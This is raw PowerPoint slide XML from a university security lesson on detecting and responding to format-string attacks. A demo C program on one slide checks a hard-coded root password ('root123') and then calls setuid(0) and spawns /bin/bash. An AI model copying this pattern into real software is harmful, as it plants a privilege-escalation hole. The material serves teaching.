    <p:sldLayoutId id="2147484087" r:id="rId16"/>
    <p:sldLayoutId id="2147484088" r:id="rId17"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:title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stackoverflow.com/questions/3401156/what-is-the-use-of-the-n-format-specifier-in-c"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en.wikipedia.org/wiki/Stack_(abstract_data_type)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Q2sFmqvpBe0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/3401156/what-is-the-use-of-the-n-format-specifier-in-c" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Subroutine" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Data_structure" TargetMode="External"/><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hyperlink" Target="https://stackoverflow.com/questions/3401156/what-is-the-use-of-the-n-format-specifier-in-c"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3401156/what-is-the-use-of-the-n-format-specifier-in-c"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hemeOverride" Target="../theme/themeOverride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055EA59-BCF4-4FB8-A444-51B5021BBEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="692150"/>
            <a:ext cx="10369152" cy="1760538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CYBER AEGIS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Handong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Global Univ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack Detection and Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D16E5F7-1F05-4D31-9AB2-028EEC533FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503712" y="3137694"/>
            <a:ext cx="6440488" cy="2535238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>Dec. 20, 2021.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>DuDuIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>, Inc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>Yoonjeong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> Kim, Ph.D. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>yjkim.87@duduit.co.kr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9CFB22-A1F1-4BD9-ABA2-A3042E411AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069629" y="5737801"/>
            <a:ext cx="9144000"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sz="1400" kern="0" dirty="0"/>
              <a:t>Hello, this is #81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> Attack Detection and Response.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>If you have any questions or comments, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>please feel free to contact my-email yjkim.87@duduit.co.kr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245844" y="942366"/>
            <a:ext cx="5418108" cy="4662815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> []) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> pass = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     char buff [512]; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> &lt;2) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "Failed: Usage [% s password] \ n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> [0]); return 1; } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff), “%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "pass @% # 8x, [% d] [% # 8x] \ n", &amp; pass, pass, pass); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff) -1) == 0) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Correct Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            pass = 144; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     else { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Wrong Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (pass == 144) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     / * Now give root or admin rights to user * / </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Root privileges given to the user \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (0); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          system ( "/ bin / bash"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="961670"/>
            <a:ext cx="1853392" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> () { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return "root123"; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="612429"/>
            <a:ext cx="1989647" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The source of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277812" y="5715361"/>
            <a:ext cx="5354171" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="1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This is the secure original code. The code works like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>If you enter the root password, root123,  you will be given a root shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>If you enter a different password, it prints Wrong password and no root shell is given. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191344" y="638898"/>
            <a:ext cx="3283271" cy="276999"/>
